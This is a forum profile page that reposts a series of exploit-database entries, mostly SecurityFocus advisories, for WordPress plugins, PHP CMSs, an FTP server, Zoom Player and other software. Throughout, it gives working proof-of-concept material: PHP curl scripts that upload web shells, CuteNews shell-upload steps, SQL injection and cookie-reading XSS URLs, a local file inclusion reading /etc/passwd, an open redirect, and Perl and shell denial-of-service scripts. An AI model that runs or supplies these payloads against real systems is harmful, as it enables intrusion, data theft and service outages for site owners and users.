
Everything posted by HireHackking
-
WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities
# Exploit Title: Albo Pretorio Online 3.2 Multiple Vulnerabilities
# Google Dork: inurl:/?action=visatto
# Date: 09/06/2015
# Exploit Author: Alessandro Cingolani
# Vendor Homepage: http://plugin.sisviluppo.info/
# Software Link: https://downloads.wordpress.org/plugin/albo-pretorio-on-line.3.2.zip
# Version: 3.2
# Tested on: Firefox on Ubuntu 64 bit

==============
Introduction
==============

Albo Pretorio Online is a simple WordPress plugin that allows managing an official bulletin board (albo). Under an Italian law, publishing an albo on institutional sites became compulsory in 2009. This made the plugin very popular in the institutional environment, due to the fact that it is the only one present in the official channels.

The plugin suffers from an unauthenticated SQL Injection and various other authenticated vulnerabilities, such as XSS and CSRF. In fact the back-end does not sanitize any input/output, so many vulnerabilities are present.

=============
Front-End
=============

SQL Injection:

http://victim.com/albo-folder/?action=visatto&id=[Inject Here]

============
Back-End
============

In the back-end, no protection against SQL Injection, XSS and CSRF exists. These are just a few examples.

Blind SQL-Injection
====================

http://victim.com/wp-admin/admin.php?page=responsabili&action=edit&id=[Inject Here]
http://victim.com/wp-admin/admin.php?page=atti&action=view-atto&id=[Inject Here]

CSRF
=====

In the back-end, the item deletion is not protected, so any element (acts, responsibles, etc.) could be deleted.

POC:

Responsible deletion
http://victim.com/wp/wp-admin/admin.php?page=responsabili&action=delete-responsabile&id=***responsabile's id***

Act deletion
http://victim.com/wp/wp-admin/admin.php?page=atti&action=annulla-atto&id=***atto's id***

Stored XSS
===========

This plugin does not sanitize any output, so each form input, except email, is vulnerable to stored XSS.

Also some Reflected XSS and a possible Shell Uploading vulnerability were discovered and fixed.

Timeline
=========

9/06/2015 - Vulnerabilities found. Developer informed
17/06/2015 - Patch released (Version 3.3)
02/07/2015 - Exploit disclosed
-
PHP-Fusion Advanced MP3 Player Infusion - 'upload.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/54228/info

PHP-Fusion Advanced MP3 Player Infusion is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Advanced MP3 Player Infusion 2.01 is vulnerable; other versions may also be affected.

PostShell.php

<?php
$uploadfile="lo.php.mp3";
$ch = curl_init("http://www.example.com/php-fusion/infusions/mp3player_panel/upload.php?folder=/php-fusion/infusions/mp3player_panel/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access:
http://www.example.com/php-fusion/infusions/mp3player_panel/lo.php.mp3

lo.php.mp3

<?php phpinfo(); ?>
-
TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/54235/info

TEMENOS T24 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

GET /jsps/genrequest.jsp?&routineName=OS.NEW.USER&routineArgs=BANNER"/><STYLE>@import"javascript:alert('XSS%20Dangerous')";</STYLE> HTTP/1.1
-
LIOOSYS CMS - SQL Injection / Information Disclosure
source: https://www.securityfocus.com/bid/54239/info

LIOOSYS CMS is prone to an SQL-injection vulnerability and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following example URIs are available:

http://www.example.com/index.php?id
http://www.example.com/_files_/db.log
-
JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/54238/info

JAKCMS PRO is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

JAKCMS PRO 2.2.6 is vulnerable; other versions may also be affected.

<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.example.com/admin/uploader/uploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'catID'=>'../admin/css/calendar/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-
SWFupload - 'movieName' Cross-Site Scripting
source: https://www.securityfocus.com/bid/54245/info

SWFUpload is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SWFUpload 2.2.0.1 is vulnerable; prior versions may also be affected.

http://www.example.com/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
-
Zoom Player - '.avi' Divide-by-Zero Denial of Service
source: https://www.securityfocus.com/bid/54249/info

Zoom Player is prone to a remote denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, resulting in denial-of-service conditions.

Zoom Player 4.51 is vulnerable; other versions may also be affected.

#------------------------------------------------------------------------#
#                                                                        #
#   Usage : perl zoom.pl                                                 #
#                                                                        #
#------------------------------------------------------------------------#

my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00
\x9b\x0e\xf3\xf8\xdb\xa7\x3b\x6f\xc8\x16\x08\x7f\x88\xa2\xf9\xcb
\x87\xab\x7f\x17\xa9\x9f\xa1\xb9\x98\x8e\x2b\x87\xcb\xf9\xbe\x50
\x42\x99\x11\x26\x5c\xb6\x79\x44\xec\xe2\xee\x71\xd0\x5b\x50\x4e
\x37\x34\x3d\x55\xc8\x2c\x4f\x28\x9a\xea\xd0\xc7\x6d\xca\x47\xa2
\x07\xda\x51\xb7\x97\xe6\x1c\xd5\xd8\x32\xf9\xb1\x04\xa7\x08\xb2
\xe9\xfb\xb5\x1a\xb7\xa7\x7a\xa6\xf9\xf6\xc9\x93\x91\xa1\x21\x29
\xa3\x1c\xe3\xc7\xcb\x17\xfd\x8d\x65\xfd\x81\x61\x6b\x89\xaf\x53
\x31\x45\x0c\x71\xcb\x93\xcb\x6e\x2a\xcf\xa6\x76\x1a\xa8\xcc\xad
\x81\xfd\xc4\x56\xa7\x82\xda\x3d\x20\x80\xff\x4c\xbe\xc0\x4c\x61
\x9e\x75\x4c\x71\xa2\x9d\xfd\x65\xcc\x59\x23\xe0\xeb\xae\x58\xa3
\xe9\xff\x16\xfc\x08\x03\x36\x4a\x69\xbb\xc4\x19\x10\x1b\xc8\x2c
\x9e\xd9\x56\xfe\x38\x32\xf7\xe5\x2c\xd8\xb4\x6c\x31\xcc\x15\x5c
\x41\xda\x03\xde\x5c\x23\x2d\xda\x4f\x7b\x44\x07\x60\x24\xa7\x58
\x65\xf7\xe9\xaa\xff\x02\x9d\x1f\x39\x76\x7e\x75\x43\xac\xe5\xc9
\xd0\x43\x2e\x4c\xeb\x81\x26\xb5\xcf\x6d\xb9\xe9\xa0\xc7\x85\x4a
\xce\x5f\xb4\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x06\x00\x00\x00\xff
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff
\xcb\x6e\x2a\xcf\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

# A division by zero exploit causing a DoS to the program (you can neither play anything nor close the program).
# To close the Zoom Player you have to use the Windows Task Manager.

my $file = "darkexploit.avi";
open ($File, ">$file");
print $File $h;
close ($File);

#-------------------------------------------------------------------------------
-
Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/54255/info

Items Manager Plugin for GetSimple CMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Items Manager Plugin 1.5 is vulnerable; other versions may also be affected.

<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.example.com/getsimple/plugins/items/uploader/server/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-
CuteNews 2.0.3 - Arbitrary File Upload
CuteNews 2.0.3 Remote File Upload Vulnerability
=================================================

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

##########################################
I'm T0x!c member from Inj3ct0r Team
##########################################

# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to : Tr00n, Kha&mix, Cc0de, Ghosty, Ked ans, Caddy-dz .....
==========================================================

# Exploit :

Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

1 - Sign up for New User
2 - Log In
3 - Go to Personal options
    http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar
    Example: Evil.jpg
5 - Use Tamper Data & rename file Evil.jpg to Evil.php
    -----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
    Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
-
PHP MBB - Cross-Site Scripting / SQL Injection
source: https://www.securityfocus.com/bid/54271/info

php MBB is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

php MBB 0.0.3 is vulnerable; other versions may also be affected.

http://www.example.com/mbbcms/?ref=search&q=' + [SQL Injection]
http://www.example.com/mbbcms/?mod=article&act=search&q=' + [SQL Injection]
http://www.example.com/mbbcms/?ref=search&q= [XSS]
http://www.example.com/mbbcms/?mod=article&act=search&q= [XSS]
-
gnome-terminal (vte) VteTerminal - Escape Sequence Parsing Remote Denial of Service
source: https://www.securityfocus.com/bid/54281/info

VTE is prone to a vulnerability that may allow attackers to cause an affected application to consume excessive amounts of memory and CPU time, resulting in a denial-of-service condition.

echo -en "\e[2147483647L"
echo -en "\e[2147483647M"
echo -en "\e[2147483647P"
-
plow - '.plowrc' File Buffer Overflow
source: https://www.securityfocus.com/bid/54290/info

plow is prone to a buffer-overflow vulnerability.

Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

plow 0.0.5 and prior are vulnerable.

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc
-
Classified Ads Script PHP - 'admin.php' Multiple SQL Injections
source: https://www.securityfocus.com/bid/54299/info

Classified Ads Script PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Classified Ads Script PHP 1.1 is vulnerable; other versions may also be affected.

http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[ ASC/ DESC ]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/test/classifiedscript/admin.php?act=ads&orderType=[SQL-INJECTION]
http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType=[ASC / DESC ]&search=&orderBy=[SQL-INJECTION]
http://www.example.com/test/classifiedscript/admin.php?act=comments&ads_id=&orderType[SQL-INJECTION]
-
WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
source: https://www.securityfocus.com/bid/54320/info

SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

SocialFit 1.2.2 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E
-
Solar FTP Server - Denial of Service
source: https://www.securityfocus.com/bid/54306/info

Solar FTP Server is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to force the affected application to become unresponsive, denying service to legitimate users.

Solar FTP Server 2.2 is vulnerable; other versions may also be affected.

# Exploit Title: Solar FTP Server 2.2 Remote DOS crash POC
# crash:http://img542.imageshack.us/img542/7633/solar.jpg
# Date: July 4, 2012
# Author: coolkaveh
# coolkaveh () rocketmail com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://solarftp.com/
# Version: 2.2
# Tested on: windows XP SP3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# When sending multiple parallel crafted requests to a Solar FTP Server it crashes
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy Solar FTP Server Remote Denial Of Service
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Parallel::ForkManager;
$|=1;
sub usage {
  print "Crappy FTP Server Remote Denial Of Service\n";
  print "by coolkaveh\n";
  print "usage: perl killftp.pl <host> \n";
  print "example: perl Crappyftp.pl www.example.com \n";
}
$host=shift;
$port=shift || "21";
if(!defined($host)){
  print "Crappy FTP Server Remote Denial Of Service\n";
  print "by coolkaveh\n";
  print "coolkaveh () rocketmail com\n";
  print "usage: perl killftp.pl <host> \n";
  print "example: perl Crappyftp.pl www.example.com \n";
  exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
  print "$host -> $port is alive.\n";
  $check_first->close;
}
else{
  die("$host -> $port is closed!\n");
}
@junk=('A'x5,'l%q%j%z%Z'x1000,
'%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
'%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
'%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x57,'-1','0','0x100',
'0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
);
@command=(
'NLST','CWD','STOR','RETR','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD','MKD','RMD',
'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
);
print "Crashing Server!\n";
while (1) {
  COMMAND_LIST:
  foreach $cmd (@command){
    foreach $poc (@junk){
      LABEL5:
      $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
      if(defined($sock4)){
        $sock4->send("$cmd"." "."$poc\r\n", 0);
        $sock4->send("$poc\r\n", 0);
      }
    }
  }
}
-
WordPress Plugin custom tables - 'key' Cross-Site Scripting
source: https://www.securityfocus.com/bid/54326/info

WordPress custom tables plugin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

custom tables 3.4.4 is vulnerable; prior versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
-
WordPress Plugin church_admin - 'id' Cross-Site Scripting
source: https://www.securityfocus.com/bid/54329/info

The church_admin plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

church_admin plugin Version 0.33.4.5 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E
-
WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting
source: https://www.securityfocus.com/bid/54330/info

Knews Multilingual Newsletters for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Knews Multilingual Newsletters 1.1.0 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
-
sflog! - 'section' Local File Inclusion
source: https://www.securityfocus.com/bid/54334/info

sflog! is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.

sflog! 1.00 is vulnerable; other versions may also be affected.

http://www.example.com/sflog/index.php?blog=admin&section=../../../../../../../etc/&permalink=passwd
-
Apache Sling - Denial of Service
source: https://www.securityfocus.com/bid/54341/info

Apache Sling is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, resulting in a denial-of-service condition.

Apache Sling 2.1.0 and prior are vulnerable.

curl -u admin:pwd -d "" "http://example.com/content/foo/?./%40CopyFrom=../"
-
WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting
source: https://www.securityfocus.com/bid/54332/info

PHPFreeChat is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PHPFreeChat 0.2.8 is vulnerable; other versions may also be affected.

http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
-
WebsitePanel - 'ReturnUrl' Open Redirection
source: https://www.securityfocus.com/bid/54346/info

WebsitePanel is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

WebsitePanel versions prior to 1.2.2.1 are vulnerable.

https://www.example.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>
https://www.example1.com/hosting/Default.aspx?pid=Login&ReturnUrl=http://<any_domain>/file.exe>
-
MGB - Multiple Cross-Site Scripting / SQL Injections
source: https://www.securityfocus.com/bid/54348/info

MGB is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MGB 0.6.9.1 is vulnerable; other versions may also be affected.

http://www.example.com/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
http://www.example.com/mgb/index.php?p=1â??"</script><script>alert(document.cookie)</script> [XSS]
http://www.example.com/mgb/newentry.php [XSS]
-
Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/54391/info

Kajona is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Kajona 3.4.1 is vulnerable; other versions may also be affected.

http://www.example.com/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=contact&absender_nachricht=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?page=postacomment&comment_message=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&keywords=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
Flogr - 'tag' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/54354/info

Flogr is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Flogr 1.7 is vulnerable; other versions may also be affected.

http://www.example.com/recent.php?tag=[xss]
http://www.example.com/index.php?tag=[xss]